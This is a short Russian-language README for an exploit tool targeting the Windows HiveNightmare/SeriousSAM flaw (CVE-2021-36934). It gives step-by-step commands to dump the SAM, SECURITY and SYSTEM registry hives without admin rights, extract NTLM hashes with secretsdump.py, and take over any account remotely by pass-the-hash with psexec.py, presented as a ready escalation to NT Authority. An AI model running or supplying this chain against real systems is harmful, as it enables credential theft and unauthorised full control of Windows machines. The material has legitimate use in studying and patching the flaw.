
Эксплойт для CVE-2021-36934
Эксплойт для уязвимости HiveNightmare/SeriousSAM, который позволяет читать кусты реестра, содержащие чувствительные данные, без прав администратора. Если это не звучит как повышение привилегий, то я уже не знаю, что звучит.
После сборки эксплойта с помощью cargo build и получения бинарного файла разверните его в своей тестовой среде, откройте CMD и выполните .\oxide_hive [max shadow copies]; по умолчанию количество теневых копий равно 15. Кусты реестра SAM, SECURITY и SYSTEM должны быть выгружены в рабочую директорию.
После этого вы можете использовать этот скрипт с командой secretsdump.py -sam SAM.dump -security SECURITY.dump -system SYSTEM.dump local, чтобы получить NTLM-хеши.
Затем вы можете использовать другой скрипт с командой psexec.py -hashes <account's hash> <user>@<machine's ip> cmd.exe, чтобы удалённо войти в любую учётную запись. Поздравляю, вы только что перешли от непривилегированного пользователя к NT Authority всего за 3 команды.